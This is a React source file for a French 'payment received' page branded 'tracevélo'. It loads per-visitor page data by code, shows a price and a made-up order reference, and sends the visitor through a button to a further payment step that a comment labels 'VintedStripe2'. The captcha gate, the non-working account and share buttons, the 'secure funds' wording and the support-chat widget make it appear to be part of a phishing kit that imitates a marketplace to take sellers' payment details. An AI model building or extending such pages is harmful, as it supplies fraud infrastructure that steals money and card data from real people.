import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './TraceveloFrSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { API_URL } from '../apiBase';
import { traceveloFrSuccessCopy as c } from '../traceveloFrSuccessCopy';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const LOGO_SRC = `${process.env.PUBLIC_URL || ''}/tracevelo-fr-logo.png`;
const FOOTER_SRC = `${process.env.PUBLIC_URL || ''}/tracevelo-fr-footer.png`;

function resolvePhotoUrl(raw) {
  const u = (raw || '').trim();
  if (!u) return '';
  if (u.startsWith('http://') || u.startsWith('https://')) return u;
  const base = API_URL.replace(/\/$/, '');
  return `${base}/${u.replace(/^\//, '')}`;
}

function orderRefFromCode(pageCode) {
  if (!pageCode) return '—';
  let h = 0;
  for (let i = 0; i < pageCode.length; i += 1) h = (h * 31 + pageCode.charCodeAt(i)) >>> 0;
  return String(1000 + (h % 9000));
}

function IconUser() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="#111" strokeWidth="1.6" aria-hidden>
      <path d="M20 21a8 8 0 0 0-16 0" strokeLinecap="round" />
      <circle cx="12" cy="8" r="4" />
    </svg>
  );
}

function IconShare() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="#111" strokeWidth="1.6" aria-hidden>
      <circle cx="18" cy="5" r="2" />
      <circle cx="6" cy="12" r="2" />
      <circle cx="18" cy="19" r="2" />
      <path d="M8 11l8-5M8 13l8 5" strokeLinecap="round" />
    </svg>
  );
}

/** tracevélo (FR) — après captcha → index2 (VintedStripe2). */
function TraceveloFrSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [imgFailed, setImgFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'FR').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'EUR';
  const sym = getSymbol(currencyCode);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null ? '—' : priceNumber % 1 === 0 ? String(Math.round(priceNumber)) : String(priceNumber);
  const amountDisplay = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const orderRef = orderRefFromCode(pageCode || pageData?.page_code || '');

  const rawPhoto = (pageData?.photo_url || '').trim();
  const photoSrc = resolvePhotoUrl(rawPhoto);
  const showPhoto = Boolean(photoSrc && !imgFailed);

  if (loading && pageCode) {
    return (
      <div className="tv-wrap">
        <p className="tv-loading">{c.loading}</p>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="tv-wrap">
      <header className="tv-header">
        <div className="tv-header-inner">
          <a href="#/" className="tv-brand" onClick={(e) => e.preventDefault()}>
            <img src={LOGO_SRC} alt="tracevélo" className="tv-brand-img" width={150} height={30} decoding="async" />
          </a>
          <button type="button" className="tv-user" aria-label="Compte" onClick={(e) => e.preventDefault()}>
            <IconUser />
          </button>
        </div>
      </header>

      <main className="tv-main">
        <div className="tv-main-inner">
          <nav className="tv-bc" aria-label="Fil d'Ariane">
            {c.breadcrumbOrder} / <strong>{c.breadcrumbReceive}</strong>
          </nav>

          <div className="tv-photo-wrap">
            {showPhoto ? (
              <img className="tv-photo" src={photoSrc} alt="" onError={() => setImgFailed(true)} decoding="async" />
            ) : (
              <div className="tv-photo" aria-hidden />
            )}
          </div>

          <section className="tv-card" aria-label={c.title}>
            <div className="tv-card-top">
              <div>
                <p className="tv-card-title">{c.title}</p>
                <p className="tv-card-id">{orderRef}</p>
                <p className="tv-paid">
                  <span className="tv-paid-amount">{amountDisplay}</span>
                </p>
                <div className="tv-muted">
                  {priceText === '—' ? '' : `${priceText} ${sym} ${c.includesProtection}`}
                </div>
              </div>
              <button type="button" className="tv-share" aria-label="Partager" onClick={(e) => e.preventDefault()}>
                <IconShare />
              </button>
            </div>

            <div className="tv-kv">
              <div>
                <div className="tv-k">{c.paidLabel}</div>
                <div className="tv-v">{amountDisplay}</div>
              </div>
              <div>
                <div className="tv-k">{c.deliveryLabel}</div>
                <div className="tv-v">{c.offer}</div>
              </div>
              <div>
                <div className="tv-k">{c.deliveryZone}</div>
                <div className="tv-v">{c.metro}</div>
              </div>
              <div>
                <div className="tv-k">{c.secureFunds}</div>
                <div className="tv-v">—</div>
              </div>
            </div>

            <Link to={index2Path} className="tv-cta">
              {c.cta}
            </Link>
          </section>
        </div>
      </main>

      <footer className="tv-footer">
        <img src={FOOTER_SRC} alt="" className="tv-footer-img" width={1024} height={106} decoding="async" />
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default TraceveloFrSuccess;

